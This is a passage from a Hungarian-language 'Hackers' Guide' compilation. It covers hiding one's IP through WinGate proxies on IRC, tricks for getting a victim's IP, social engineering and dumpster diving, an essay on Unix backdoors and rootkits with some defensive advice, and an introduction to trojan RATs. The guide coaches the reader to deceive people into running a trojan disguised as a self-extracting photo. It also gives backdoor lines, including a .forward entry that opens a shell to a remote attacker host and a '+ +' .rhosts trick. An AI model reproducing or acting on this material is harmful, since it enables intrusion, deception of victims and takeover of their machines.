irjuk be a statusba: /server ttt.wingate.com:23 most egy WinGate> promptot kapunk, majd egy csomo szemetet, mert a kliens automatikusan elkuldi a NICK es USER uzeneteket (ugye elolvastad az RFC1459et?) mIRC-ben: /raw irc.wingate.com:6667 kapjuk, hogy connected, mire beirjuk: /raw NICK Wizard /raw USER Magic Fairie [email protected] :Hacker PIRCH-ben: /quote irc.wingate.com:6667 megintcsak connected, ha minden jol megy, es akkor beirjuk: /quote NICK Wizard /quote USER Magic Fairie [email protected] :Hacker Es ha beenged a szerver, akkor kezdhetsz IRC-elni, es barki lekerdezi az IP-det, azt fogja latni, hogy a ttt.wingate.com-rol jottel be ;) Es valoban onnan is jottel, nem igaz? Van egy kis bokkeno. Nem tudok magyar WinGate szervert, es a magyar szerverek nem fogadnak el amerikai csatlakozast. Ez az egyik. Masik: sok szerveren K-Linera teszik a WinGate szervereket. Gondolj bele: egy IP-rol max. harom csatlakozast fogadnak el, igy megduplazhatod ezt, vagy akar meg is sokszorozhatod. Hogy nez ma az ki hogy valaki 15 peldanyban van fent? (Jol nez ki, de az IRCopok szerint nem :) Az elso problema a nagyobb, mert a magyar szervereken meg nem lattam WinGate-t K-Linen csak kulonfele sulinetes(!) szervereket. 84
Hackers’ Guide
IV. Végszó Eredetileg ide valami utbaindito konnyes szoveget akartunk irni, de aztan rajottunk, hogy egy igazi hacker ugyis rajon, mit kell tennie, hogy ne kapjak el, a tobbi meg inkabb bukjon le! :) Ugyhogy inkabb csak az elerhetosegunket irjuk ide: IRCNet, qocok es Voyager2 nick, mindig mashol, de altalaban az #eurohack csatornán. A csatorna pontos nevét lásd ahttp://hackers.freeshell.orgoldalon. E-mail:[email protected]é[email protected] Vegezetul: nehogy azt gondold, hogy ez minden! Ez az alap! Es nehol annyira kozerthetoen fogalmaztunk, hogy az mar a szakszeruseg rovasara ment!
************************************************************************************************
Az IP szerzés módszerei Essünk túl az IP fogalmán. IP (Internet Protocol) : 1 hálózati rétegprotokoll, amely a gazdaszámítógépek között továbbítja az adatokat. Ez azonban nem teljesen pontos, mert a felhasználók többsége azt hiszi, de még az Internettel foglalkozó irodalom jelentős része is az IP-címeket a gazda számítógépekkel hozzák kapcsolatba. Tudni kell azonban, hogy az Interneten lévő számítógép valójában nem rendelkezik IP címmel. az IP-cím a számítógépben lévő Ethernet interfészkártya is lehet, ezek mind1ike saját 1edi IP címmel rendelkezik. Az 1*-űség kedvéért általában az IPcímet a gazdagéphez kapcsoljuk, de ne felejtsük el, hogy, ténylegesen az interfészkártyáé (nem mindig gazda számítógépé) az IP-cím. Remélem érthető volt... Az IP szerzés módszerei (kezdőknek) : 1. A balfasz : kérdezzük + tőle mi az ip-je. Ezt, pl. úgy tudjuk elérni, hogy felhívjuk rá az érdeklődését pl: tudtad, hogy minden gép kap belépéskor 1 IP-számot és te neked is van bla,bla,bla.(sokszor bejön) 2.E-mail Írjunk neki 1 e-mailt mindenféle kamu szöveggel, a lényeg hogy jöjjön valami válasz rá. Ha megkaptuk a levelet, mentsük le. Így kapunk 1 eml kiterjesztésű filet. Ezután már csak meg kell néznünk 1 bármilyen 1*-ű wieverrel és máris +kapjuk 1 csomó adatot, de nekünk most csak ez a pár a fontos pl: balfasz.matav.hu (d27-bp.matav.hu [145.236.158.78]) Így +van az IP is és sok esetben az is, hogy hol lakik az illető. Persze mint tudjátok elterjedtek az ingyenes e-mailszolgáltatók. Nincs gond. Legtöbbször a páciens valamilyen levelező prg-n át használja a szolgáltatást pl: outlook. Így ugyanazon a mail serveren jön át, tehát ugyanazokat az adatokat kapjuk +. A gond akkor van, ha az illető a Web felületről küldi a levelet, akkor ugyanis csak 85
Hackers’ Guide
ezt kapjuk meg a módszerral pl: (ns0.matav.hu [145.456.452.25]) ez lófasz sajnos semmit nem ér, ekkor obi van kenobi. Tehát ha te se akarod +szívni akkor mindig Webes felületről levelezz. 3. Chat : A csetek nagyon jó támadópontok. Itt az ember nick (bece) neve mellé van írva az ip-je vagy a hostja. Sajnos már 1-re több cseten levették ezt. De pl: a Talk Café-n és még jó pár cseten azért van. Ahol nincs kiírva, ott sincs gond. Jöhet a javaban irt kis programok. (álltalába minden csethez másik kell) Térjünk vissza a hostra. Hostból IP. Nagyon 1*-ű alap módszer de mindig müxik a következő: hozzávalók: nyiss 1 dos ablakot, írd be, hogy tracert host pl: tracert d1bp.matav.hu és kész is. 4, ICQ. Ez egy jó progi de nem biztonságos. Van az embernek 1 UINszáma. Na ezt bepötyögöd az ICQ snifferbe és máris kész az IP. (icq-ról bővebben az icq-részbe) Pár prg ami tovább könnyíti a dolgotokat: Ping : gyors IP cím Fastscan : gyors port scanner Itt 1 kicsit bonyolultbb módszer az IP szerzésre: A következő számok ugyanannak az IP-címnek az azonos értékű +jelenései - Az IP cím bináris számként: 10000110 00011000 00001000 01000010 - Az IP-cím decimális számként : 2,249,721,922 (vagy -2,045,245,374) - Az IP-cím hexadecimális számként : 0x86180842 - Az IP-cím pontokkal elválasztott decimális számként : 134.24.8.66 Ennyit egyenrőle az IP-ről. Még lesznek módszerek meg trükkök. Azért kell ezzel ennyit foglalkozni, mert alap dolog és majdnem mindenhez kell a továbbiakban... Dodge Viper http://w3.swi.hu/dviper
************************************************************************************************
Social Engineering (társadalommérnökség) Social Engineering, azaz emberek manipulálásával bejutni számítógépes rendszerbe. Ne higgyük azt, hogy ez nem igazi Hacker módszer. Ezt a módszert alkalmazta a nagy hacker Kevin Mitnick is sokszor. A Hackerek és Crackerek között nagyon kevés a nő, mégis vannak +határozó személyek. A Social Engineering módszert nagyon magas szinten alkalmazó Hacker is nő volt. Susan Thunder, aki mellesleg Kevin Mitnick környezetében tartózkodott. Nézzünk + Susan hogyan bizonyította be, hogy a módszer nagyon is hatékony... A törés helye 1 tárgyalóterem volt, ahol a tengerészet és a légierő magas rangú tisztjei ültek. Susannak 1 borítékot adtak, amiben a +adták a computerközpont nevét, amit + kellett törni. A cél
86
Hackers’ Guide
érdekében bármilyen eszközt igénybe vehetett (computer, modem , telefon ). Susan rögtön csatlakozott a könnyen hozzáférhető katonai számítógépre, és kikereste a főbb adatokat. A lényeg az volt, hogy kikereste a gépet karbantartó emberke nevét. Felhívta a bázist telefonon, és kiderítette, hogy ki a parancsnok. Nem kellet mást tennie csak használni a szakzsargont és máris az ölébe hullott az infó, hogy Hasting őrnagy az akit keres. Még azt is sikerült kiderítenie, hogy az őrnagy titkárnőjét Hastingsnak hívják.. Ennyi infó elég volt, hogy felhívja a +törendő számgépközpontot. A következők hangzottak el. -Buchanan vagyok. Az őrnagy +bízásából telefonálok, mert nem tud beloggolni a rendszerbe.. Az őrnagy kérdezi, hogy ennek mi az oka. (a rendszergazda +tagadta a választ.) (ekkor Susan erősebb hangnemet vett föl) -Nézze nem azért telefonáltam, hogy az időmet fecséreljem! Mi a neve, beosztása, és szolgálati száma? Még 20 perc sem telt el és Susan birtokában voltak az első titkos infók.. Mielőtt tovább lépett volna, a tábornok felállt az asztaltól és csak annyit mondott, hogy ennyi 1enlőre elég lesz….. Tehát bebizonyosodott az, hogy minden rendszer leggyengébb láncszeme az ember. Az se véletlen, hogy a számitógépes betörések nagy részét belső emberek követik el. 1 hacker számára a leg1*űbb +oldás pénzzel, zsarolással belső kapcsolatra szert tenni. Éppen erre szolgál a Social Engineering. Akinek nincs elég pénze lefizetni 1 rendszergazdát az vezzese félre azt. El kell vele hitetni, hogy ő 1 jogosult felhasználó. Már említettem hogy Kevin Mitnick is használta ezt a módszert előszerettel. Lássuk, hogyan tette. A Los Angelesi COSMOS központjába lopakodott. Rövid 1eztetés után Mitnick és két társa, Roscoe , és Mark Rossl 1*üen besétált az épületbe, és odament az ügyeletes tisztviselő asztalához. Kiadtág magukat a Pacific Bell alkalmazottainak. Azt a szöveget nyomták, hogy másnapra + kell írniuk 1 jelentést. Még az azonosítószámukat sem kérték……Az út szabad volt +keresték a 108-as szobát. Amit már előzetes informálódás során kiderítették, hogy az a szoba érdekes nekik.. Majd a rendszergazda szobájába találtak 6 darab kézikönyvet, amiben a Cosmos computerről volt minden információ. Magukhoz is vették 1ből. Majd kisétáltak. Több cikket is olvastam különböző külfoldi lapokon erről a témáról, és mind1iken máshogy szerepelnek az adatok/tények, a módszer lényeget leírtam, az ugyanaz volt mind1ikben. Dodge Viper 1999.12.20. http://w3.swi.hu/dviper
************************************************************************************************
Trashing or dumpster diving (kukabúvárkodás)
87
Hackers’ Guide
A hackerek közkedvelt módszere a kukabúvárkodás. Vagyis elmennek a kiszemelt céghez este, és ott átkutatják a szemeteseket. A kidobott szemétben próbálnak minél több hasznos infót összegyűjteni. Ilyenkor minden kis adat fontos lehet. Az adott személy hova jár szórakozni, kedvenc étele, a kidobott papírok alapján + kell próbálni kideríteni a jelenlegi vagy régi loginnevet/jelszót. Elég fura elképzelni, hogy az információ szabadságharcosai ott álnak a kuka előtt és könyékig benne túrnak. De hát ez van. A célért mindent! Ezt a módszert is alkalmazta a legnagyobb hacker, Kevin Mitnick és társa Blake Harris is, amikor a Cosmos központjába próbáltak behatolni. Sajnos valaki/valakik már +előzték őket.
Dodge Viper 1999.12.25. http://w3.swi.hu/dviper
************************************************************************************************
Backdoors
Az elso betoresek ota a hackerek mindig megprobaltak ujabb technikakat es kiskapukat talalni, amellyekkel bejuthatnak a rendszerbe. Ebben a doksiban megemlitek nehany backdoort illetve a felismeresukrol is lesz par mondat. Nagyreszt a UNIX-rol lesz szo, de a Windows NT-rol is lesz egy resz. A leiras bemutatja, hogy a behatolok hogyan juthatnak be a rendszerbe, illetve segitseget nyujt az adminisztratoroknak, az ujabb tamadasok ellen. Mikor egy adminisztrator tudja, hogy milyen nehez egy betolakodot eltavolitani, ha mar az egyszer bejutott, akkor ertheto, hogy megbecsuli az elozetes vedekezest. Ez abbol all, hogy minnel tobb a kezdo es profi hackerek altal hasznalt rest derit fel. Persze nem az osszeset, hisz a lehetosegek szama vegtelen. Egy bacdoor a legtobb betolakodonak ket, vagy 3 dolgot nyujt: Kepes visszaterni a gepbe, meg akkor is, ha az adminisztrator megprobalja azt biztonsagosabba tenni PL.: a passwordok kicserelesevel Kepes legyen visszaterni a rendszerbe a leheto legrovidebb ido alatt. A legtobb hacker szeret egyszeuen visszaterni a rendszerbe az egesz gep ujrefeltorese nelkul. Nehany esetben, ha a hacker ugy erzi, hogy az adminisztrator talat egy altala letrehozott rest, akkor a gep sebezhetoseget, kihasznalva lep be ujra. Igy elkeruli azt, hogy az adminisztrator esetleg felfedje. Nehany esetben a gep sebezhetosege marad az egyetlen backdoor. A password feltores Az elso es a legosibb modszer a bejutasra nem csak a UNIX-on, hanem a tobbi rendszeren is a password feltoro programok futtatasa. Ezzel szerezhetok egyszeru
88
Hackers’ Guide
passwordos accountok. Igy az osszes feltort kulcsszo backdoor lehet addig, amig az adminisztrator le nem tiltja oket. Sokszor a behatolo olyan hasznalatlan accountokat keres, amelyeknek egyszeru passwordjeik vannak, amiket aztan kesobb bonyolultabbakra nevezhet at, igy amikor az adminisztrator gyenge passwordoket keres, a modositattakat mar nem fogja megtalani. Igy az adminisztrator, mar nem fogja olyan egyszeruen megtalani azokat az accountokat, amelyeket meg kell szuntetnie. Rhosts + + A halozatba kotott UNIX gepeke az Rsh es az Rlogin szolgaltatasoknal csak egyszeruen az rhost fileban levo hostnev alapjan azonositjak a gepeket. A felhasznalo konnyen beallithatja, hogy melyik gepektol nem ker passwordot belepeskor. Egy hacker ez kihasznalhatja, ha egy "+ +" -t beir az aldozat gepenek rhost filejaba, ekkor ugyanis barki hasznalhatja azt az accountot password nelkul. Rengeteg hacker kihasznalja ezt, amikor az NFS exportalja a home konyvtarat a vilagnak. Ezeken a hatso ajtokon a hackerek visszaterhetnek a rendszerbe. Sok hacker jobban szereti az Rst-t, mint az Rlogint, mert az a legtobb rendszerben le van tiltva, vagy lockolva van. Sok adminisztrator keresi a "+ +" -t ezert a legtobb hacker egy hostnevet es egy felhasznaloi nevet rak a fileba egy masik feltort geprol, igy kevesbe feltuno a dolog. Checksum es Timestamp Regen sokan kicsereltek a binaros fileokat a sajat trojai programjaikkal. Sok adminisztrator hasznalt ido es adatvaltozast figyelo programokat, PL.: a UNIX checksum programjat, hogy eszrevegyek, ha egy binaris file megvaltozott. A hackerek rajottek a technologiara, amivel a trojai program idejet beallithattak az eredeti programeval megegyezore. Ez ugy mukodott, hogy a rendszerorat visszaallitottak az eredeti file idejere es ekkor raktak fel a trojai progit, majd a vegen visszaalitottak az eredeti idot a rendszeroran. A sum program a CRC cheksumra tamaszkodik es ez konnyen kijatszhato. A hackerek olyan programokat keszitettek, amelyek a trojai program meretet az eredeitiere modositottak, ezzel megoritve az adminisztratorokat. MD5 az arusok altal legtobbet ajanlott checksum program napjainkban. Az MD5 egy olyan algoritmuson alapul, amelyen a datumot bizonyitottan meg senki nem tudta kijatszani. Login A UNIX-on a login az a program, amelyik altalaban ellenorzi a passwordot, amikor valaki betelnetel a gepbe. A hackerek elloptak a login program forras kodjat es ugy modositottak azt, hogy amikor a login osszehasonlitja a felhasznalo passworjet a tarolt jelszavakkal, akkor eloszor a backdoort ellenorzi. Ha a felhasznalo beirta a backdoor jelszot, akkor beenged attol fuggetlenul, hogy az adminisztrator milyen jelszot allitott be. Ez azt jelenti, hogy a hacker barmilyen accountba rootkent jelentkezhet be. A jelszo backdoorrla azelott be lehet jutni, mielott a felhasznalo bejelentkezne es megjelenne az utmp-ben es a wtmp-ben. Igy a hacker ugy tud bejelentkezni a rendszerbe es futtatni egy shellt, hogy senki nem latja a rendszeren az accountjat. Az adminisztratorok elkezdtek figyelni ezeket a kiskapukat ugy, hogy csinaltak egy "string" parancsot amivel megkereshetik a programban levo szovegeket. Sokszor megtalaltak a rejtett jelszavakat. A hackerek ezutan bonyolutabb jelszavakat hasznaltak, vagy jobban elrejtettek oket, igy nem lehetett csak siman a stringgel megtalalni oket. Sok adminsztrator megtalalja ezeket a rejtett jelszavakat az MD5 checksummal.
89
Hackers’ Guide
Telnetd Amikor egy felhasznalo betelnetel egy gepbe, akkor az inetd figyeli a portot es fogadja a hivast, majd tovabbadja az in.telnetd-nek, amely aztan futtatja a logint. Nehany hacker rajott, hogy az az adminisztratorok meg szoktak buheralni a login programot, igy ok modositottak az in.telnetd-t. Az in.telnetd rengetek dolgot tartalmaz a felhasznalorol, pl.: azt, hogy milyen terminalt hasznal. Az atlag terminal beallitas az Xterm, vagy a VT100-as. A hacker ezt kihasznalhatja ugy, ha a terminalt "letmein"-re allitja, igy barki indithat a rendszerben shellt azonositas nelkul. Az igy beallitot rendszereken a megfelelo portokon keresztul barki futtathat shellt. Services Szinte minden halozatot feltortek mar legalabb egyszer. Az atirt verzioi a finger-nek, az rhs-nak, az rexec-nek, az rlogin-nak, az ftp-nek es meg folytathatnama vegtelensegig. Vannak programok, amelyek nem csinalnak tobbet, mint csatlakoznak a TCP porthoz es bejuttatjak a hackert. Neha ritkan hasznalt parancsokat cserelnek ki ezekre a programokra, pl.: az uucp-t, vagy egyszeruen beirjak oket az inetd.conf fileba, mint egy uj parancsot. Az adminisztratoroknak nagyon figyelniuk kell, hogy milyen parancsokat futtatnak es ellenorizniuk kell az eredeti parancsokat az MD5 checksummal. A Cronjob naplozza a UNIX rendszereken, hogy mikor kell bizonyos programokat futtatni. Egy hacker beleirhatja, hogy futtassa ejjel 1 es 2 kozt egy shellt. Igy a hacker 1 orara belephet az ejjel folyaman. A hackerek atlagosan futtatott programokat kerestek es azokba epitettek be a kiskapukat. Library A legtobb UNIX rendszer hasznal osztott konyvtarakat. Ezek arra valok, hogy a sokszor hasznalt rutinoknak ne kelljen mindig ujra helyet foglalni, ezzel csokken a programok merete. Nehany hacker megbuheralta ezeket a rutinokat, peldaul a crypt.c-t es a _crypt.c-t. A login.c hasznalja a crypt() rutint es ha a beepitett passwordot hasznalod, akkor ad egy shellt. Igy az adminisztratorok hiaba ellenoriztek le a login programot az MD5-tel, meg mindig maradt egy backdoor rutin, ha az adminisztrator nem ellenorizte le az osztott konyvtarakat. Gondot okozott a hcakereknek, amikor az adminisztratorok elkezdtek hasznalni az MD5-ot. A hackerek egyik modszere az open(), vagy a file hozzaferesi rutinok atirasa volt. Az atalakitott rutinok ugy voltak konfigutalva, hogy az eredeti fileokat olvassak, de a trojanokat futtassak. Igy amikor az MD5 olvasta ezeket nem tortent semmi kulonos, de amikor a rendszer futtatta oket, akkor a trojai verzio indult el. Igy a trojai konyvtarakat el lehetett rejteni az MD5 elol. Az adminisztartorok egy modon talalhattak meg ezeket a konyvtarakat, ha statikailag hozzalinkeltek az MD5-ot es ugy futtattak a rendszeren. A statikusan linkelt program nem a trojai verziot hasznalja. Kernel A kernel a UNIX magja. Kernel szinten ugyanigy kikerulheto az MD5 checksum, hacsak egy statikusan linkelt program elnem arulja a kulonbseget. Egy jo kernel backdoort a legnehezebb egy adminisztratornak megtalani. "Szerencsere" a kernel backdoor scriptek meg nem igazan vannak elterjedve, bar valojaban senki sem tudja, hogy milyen szeles korben terjedtek mar el. File-rendszerek Egy hacker a zsakmanyat, vagy adatait ugy akarja tarolni a rendszeren, hogy az adminisztrator ne talalja meg oket. Egy hacker cuccai altalaban exploit scriptekbol,
90
Hackers’ Guide
backdoorokbol, sniffer logokbol, masolt adatokbol, pl.: e-mailekbol, forraskodokbol es hasonlo dolgokbol allnak. Ahhoz, hogy ezeket a neha igen nagy fileokat el lehesszen rejteni, at kell kicsit irni nahany rendszer parancsot, peldaul az "ls"-t a "du"-t es az "fsck"-t. Nagyon alacsony szinten a hacker bad szektoroknak is alcazhatja oket. Igy a hackernek specialis programokra lesz szuksege, hogy hasznalhassa a cuccait, de az adminisztrator csak nagyon nehezen johet ra, hogy nem is valodiak a bad szektorai. Boot-szektor A PC-s vilagban nagyonsok virus keszult, amelyik a bootszektorban rejti el magat, ezert sok virusirto vizsgalja, a bootszektor valtozasait. UNIX-on a legtobb adminisztratornak nincs olyan programja, amivel a bootszektort ellenorizhetne, igy elrejtheto nehany backdoor a bootszektorban. Process elrejtese Egy hacker igen sokszor el akarja rejteni, hogy eppen milyen programot futtat. Altalaban a password feltoro programokat es a sniffereket akarjuk elrejteni. Eleg sok megoldas van, itt van nahany ismertebb: Lehet irni egy programot, amivel az argv[] atirhato egy masik processz azonositojara. At lehet nevezni a sniffert egy legalis program nevere, pl. in.syslog es futtatni. Igy amikor az adminisztrator csinal egy "ps"-t, hogy megnezze mit futtatsz, akkor szabalyos nevet mutatja neki. At lehet irni a konyvtarfuggvenyeket, hogy a "ps" ne mutasson meg minden processzt. A megszakitas vezerlo rutinba is lehet rakni egy backdoort, hogy ne jelenjen meg minden a processz tablabol. Erre egy lelda az amod.tar.gz, amit a http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html cimen nezhetsz meg. A kernel modositasaval is el lehet rejteni bizonyos processzeket. Rootkit A legnepszerubb backdoorok koze tartozik a rootkit. Ez konnyen megtalalhato az Internetes keresokkel. Itt van nehany fontos resz a README-bol: •
z2 - Torli a bejegyzeseket az utmp-bol, a wtmp-bol es a lastlog-bol.
•
Es - rokstar ethernet sniffere a sun4 alapu kernelekhez
•
Fix - megprobalja meghamisitani az ellenorzo programokat, egy file segitsegevel
•
Sl - titkos root passwordot ad
•
Ic - Az ifconfigot modositja
•
ps - processzrejtes
•
Ns - a netstatot modositja, hogy elrejtse a mas gepekkel valo kapcsolatot
•
Ls - filok es konyvtarak elrejtese listazaskor
•
du5 - elrejti, hogy mennyi helyet foglalsz a merevlemezen
•
ls5 - filok es konyvtarak elrejtese listazaskor
91
Hackers’ Guide
Halozatforgalom A hackerek nemcsak a filejaikat, de a halozaton valo mozgasukat is el akarjak rejteni, amennyire csak tudjak. A halozaton neha egy hackernek tuzfalakon kell keresztul jutnia. Rengeteg halozati backdoor program van, amivel a hacker beallithat maganak egy port szamot es azon keresztul a normalis ut megkerulesevel juthat be mindig. Mivel a forgalom nem egy altalanos porton keresztul tortenik, az adminisztrator megnezheti a hacker forgalmat. Ezek a halozati backdoorok altalaban TCP-t, UDP-t, es ICMP-t hasznalnak, de lehet barmi mast is. TCP Shell A hacker beallithat egy nagyon magas portszamu TCP shell backdoort maganal, ahol valoszinuleg a tuzfal nem blokkolja a TCP portot. Ezek sokszor csak egy jelszoval vannak vedve, igy amikor egy adminisztrator csatlakozik, nem fogja rogton latni a shellt. Az adminisztrator a netstat-tal nezhet utana, hogy mely portok foglaltak es honnan, illetve hova vannak kapcsolatok. Sokszor ezek a backdoorok engedik a hackert, hogy belepjen a TCP Wrapper technologiaval. Ezek a backdoorok az SMTP porton futtathatok, amelyen nagyonsok tuzfal engedelyezi az e-mail forgalmat. UDP shell Az adminisztratorok nagyon sokszor kiszurjak a TCP kapcsolatot es feljegyzik a kulonos viselkedest, de az UDP shellhez egyaltalan nem kell kapcsolat, igy a netstat sem mutatja ki, hogy hacker van a rendszerben. Sok tuzfal engedi peldaul az UDP csomagok hasznalatat a DNS-en keresztul. Sokszor a hackerek ezen a porton helyezik el a backdoort es igy kikerulheto a tuzfal. ICMP shell A pingeles az egyik legaltalanosabb mod annak a kideritesere, hogy egy rendszer mukodik-e. Ez ICMP csomagok kuldesevel es fogadasaval dolgozik. Sok tuzfal engedi, hogy belso gepeket pingeljunk. Egy hacker adatokat rakhat az ICMP csomagokba es egy shellt hozhat letre a pingelo gepek kozt. Az adminisztrator eszlelheti a sok pingelest, de ha nem veszi eszre az adatokat a csomagokban, akkor a hacker felderitetlen marad. Encrypted link Az adminisztrator csinalhat egy sniffert, hogy megnezze az adatmozgasokat, ha valaki csatlakozik egy shellhez, de a hacker "can add encryption" ??? a halozati backdoorokhoz es ezzel szinte lehetetlenne valik a ket gep kozti adatforgalom figyelese. Windows NT Mivel a Windows NT nem igazan tobbfelhasznalos rendszer a kulonallo gepeken es a tavoli bejelentkezes hasonlo, mint a UNIX-on, nehezebb betorni, backdoorokat berakni es tamadasokat futtatni egy NT-s rendszerrol. Igy sikeresebben tamadhatok a UNIX rendszerek, mint a Windows NT. Ha a Windos NT a tobbfelhasznalosag fele halad, akkor ez tobb lehetoseget ad a Windows NT-t hasznalo hackereknek. Ha ez tortenik, akkor sok UNIX backdoor atultetheto lesz az NT-re is es akkor keszulodhetnek az adminisztratorok a hackerek ellen. Ma mar vannak telnet daemonok a Windows NT ala. Halozati forgalom backdoorokkal konnyen kijatszhato az NT. Megoldasok Ahogy a backdoor technologia fejlodik, egyre nehezebb az adminisztratoroknak
92
Hackers’ Guide
eszrevenni, hogy van-e hacker a rendszerben, vagy sikerult-e teljesen eltavolitani oket. Kiertekeles Az egyik elso lepes a vedelemben az, hogy kiertekeld, milyen sebezheto a halozatod, igy kitalalhatod, hogy melyik lyukakat kell kijavitanod. Sok eszkoz van, ami figyeli es atvizsgalja a halozat es a rendszer sebezhetoseget. Egyszeru, konnyen beszerezheto progikkal is rengeteget javithat barki a rendszere bizronsagan. MD5 Az MD5 feltetlenul szukseges a rendszer vizsgalatahoz. Az MD5-ot a meg tiszta, feltoretlen rendszerekre kell felrakni. Ha egyszer egy hacker mar bejutott, akkor nagyon nehez ujra biztonsagossa tenni a rendszert. Sok meghackelt cegnek tobb honapig tart kizarni a hackereket a rendszerukbol. Nehany ceg, mikor rajott, hogy meghackeltek oket, visszaallitotta a backup-okat, remelve, hogy ezzel minden backdoort eltuntetnek. A dolog sikertelen volt, mivel a tobbi filelal egyutt a hackelteket is visszaraktak. Ezert kell a fileok binaris osszehasonlitasat meg a tamadas elott elvegezni. Betolakodo felismerese A betoresek felismerese sokkal fontosabba valik, mint a szervezetek osszekotese es a gepek osszekapcsolasanak engedelyezese. A regebbi betores felismero rendszerek a logolason alapulnak. A legujabb fejlesztesek (IDS) pedig a realtime sniffereken es a halozati forgalom figyelesen. Eleg sok halozati backdoor konnyen felismerheto. A legutobbi IDS megnezi a DNS UDP csomagokat es ellenorzi, hogy azok passzolnak-e a kero DNS protokolljahoz. Ha a DNS porton az adat nem egyezik a DNS protokallal, akkor eltarolja az adatot egy kesobbi elemzesre es egy figyelmezteto jelzessel latja el. Ugyanez tortenik az ICMP csomagokkal is. Megvizsgalja, hogy egyszeru pingrol van-e szo, vagy tartalmaz encrypted shell reszeket is. Bootolas CD-rol Sok adminisztrator szerint a CD-rol valo bootolas jo megoldas, hiszen a hackerek a CD-kre nem tudnak backdoorokat rakni. Ezzel annyi a gond, hogy sokba kerul es az egesz ceget el kell latni az eszkozokkel. Eberseg Mivel a biztonsagi megoldasok gyorsan valtoznak es nap mint nap ujabb es ujabb gyenge pontokat talalnak a hackerek, amiket ki is hasznalnak, nem art ebernek lennunk. Vigyazz, mert nincs feltorhettetlen rendszer es semmi sem helyettesitheti az allando eberseget. Ez meg hozzaadhato: .forward backdoor A UNIX gepeken a .forward file is egy altalanos megoldas a belepesre. A belepeshez a egy usernek a .forward fileba a kovetkezoket kell beirnia: \username
93
Hackers’ Guide
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh" ennek a kulonbozo valtozatai megvaltoztatjak a rendszer mail aliasait (altalaban ezek a /etc/aliases-ben talalhatok). Ez csak egy egyszeru valtozat volt, egy bonyolultabb egy scriptet is futtathat a .forward filebol, amiben bonyolultabb parancsok is lehetnek. Ui.: A fenti modszerrel be lehet jutmi a cegek levelezo rendszeren keresztul (feltetelezve, hogy osztott a home konyvtar a szerveren es a kliensen is). Az smrshval kiloheto ez a backdoor (de meg igy is lehet egy kis gond, ha engedelyezed az elm szurojet, vagy a procmail-t, mert ezek futtathatnak parancsokat...) Ez is egy jo kis backdoor: A rossz uid/gid beallitasoknal a /etc/password fileban, tobbnyire a login(1) rosszul ismeri fel a uid/gui -t es az atoi(3) az uid/gid -et 0-ra allitja, igy superuseri jogokat kapsz. pl.: rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh A linux gepeken ez 0-as uidot ad rmartinnak. VEGE Hat azt abszolute nem mondhatnam, hogy hibatlan lett a szoveg, de szerintem aki akar, az tud tanulni belole... 1999.08.05 SM-TRAX's got the groove! Irta: Christopher Claus 8/4/97 Forditotta: YLOZ [email protected] http://www.extra.hu/yloz Az eredeti angol verziot a kovetkezo cimen nezheted meg: http://www.extra.hu/yloz/stuff.html -.oOo..backdoor.txt..oOo.-
************************************************************************************************
Mi is az a trojai program Nagy sok ember tette már fel nekem azokat a kérdéseket, hogy hogyan kell használni a trojai programokat, hogyan kell valakinek a gépét megfertozni, mik valójában és hogyan muködnek? Tehát most megpróbálok minél érthetobben és átfogóbban válaszolni ezekre a kérdésekre. Összedobta: Nestan 1. Mi is az a trojai program? Elso lépésben tehát megpróbálom körülírni. A trojai programok nem tartoznak a legitim programok közé. A Mikroszkópnak és Bill boynak köszönhetoen pedig felkerültek a vírus listákra, tehát egyes víruskeresok kiírják a találatok között. Ebbol következik, hogy alkotóik nem szoftvercégek, hanem olyan magányos farkasok illetve csoportok, akik a programokhoz hasonló illegális tevékenységet folytatnak
94
Hackers’ Guide
(például hacker és cracker bandák). A Trojan programokat az angol nyelv RATnek(patkány) hívja, de ez egy rövidítés, ami a Remote Administration Tools (Távoli Adminisztrációs Eszköz) szavak kezdobetuit takarja. A program kezeloje egy távoli géprol (ami lehet akár a földgömb másik végén is) irányít egy gépet, utasítsokat ad, úgy, hogy az áldozat mit sem sejt az egészrol. Nevüket a szerzok általában valami mítikus történethez, nagy csatához, ellenségekhez kapcsolják. Érdekesség még, hogy a névhez kötheto számok általában az adott trojai portszáma is. Vegyük például a Satan Backdoor nevu elég ismert trojai programot, ami a 666-os portot használja, nemhiába, hiszen a 666 a sátán száma. Ezek a programok két részbol épülnek fel. Van egy kiszolgáló rész, ami lényegesen kisebb méretu, ezt hívjuk szervernek és van egy méretileg nagyobb ügyfélprogram (client). Ha trojai programmal szeretnél mások gépe felett szinte korlátlan hatalomhoz jutni, akkor valamilyen módon el kell juttatni hozzá a szerver részt és rá kell venni, hogy indítsa el. Ezek után már csak az IP száma kell és már meg is van. Megjegyzés: Ahhoz, hogy megtudd szerezni a lamer IP számát, elosször is rá kell venni, hogy használjon valamilyen valós ideju chat programot (pl. ICQ, IRC), mondd azt, hogy szeretnél vele jókat dumálni meg még néhány süket duma. Ha kéri, elküldöd neki email-en keresztül, ekkor udvariasan mellékeled a trojai szerver részét, azzal a megjegyzéssel, hogy ha ezt elindítod akkor regisztrálja neked a programot, ha viszont o tölti le, akkor mondd azt, hogy "itt egy kép rólam" sfx-el tömörítve, ha megakarod nézni, akkor indítsd el és o automatikusan kitömörítni magát. Persze ekkor 10 percen belul jön a válasz, hogy o mindenhol kereste, de sehol sincs. Van még egy variáció... A neten találhatók olyan programok melyek megfertoznek egy adott felhasználói programot a trojaival. Mialatt o keres, te már meg is nézted az IP számát. ICQ-ban a Windows könyvtárában lévo netstat programocska segítségével, amely a hozzád kapcsolódók Host nevét írja ki, ha a host név megvan, akkor tracert hostnev és lön IP... IRC-ben pedig "dns/ becenév" paranccsal, ennyi. Most már tied a hatalom, csak tudni kell vele élni, persze az ICQ-s módszert lehet használni IRC-nél is. A legújabb trojai programok egy részében már beépített funkció(pl. Netbus 1.7), hogy a szerver futtatása után automatikusan (SMTP) küld neked egy levelet, amelyben közli veled, hogy sikeresen beírta magát a rendszerbe, rezidensé vált, mellékeli a fobb információkat és természetesen az ürge IP számát. Ha megkaptad a levelet és sikeresen felvetted a kapcsolatot az áldozat gépén futó szerverrel, akkor innen már szinte mindenre képes leszel, olyan mintha ott ülnél a helyén és te irányítanád a gépét, persze csak addig, amíg le nem megy a netrol. A trojai programok nagyobbik része már képes a fájlkezelésre. Ezáltal képes vagy programokat futtatni / nézni / törölni / áthelyezni / feltölteni az o merevlemezén. Ez korlátlan hatalmat ad a kezedbe. Ennek segítségével te akármit 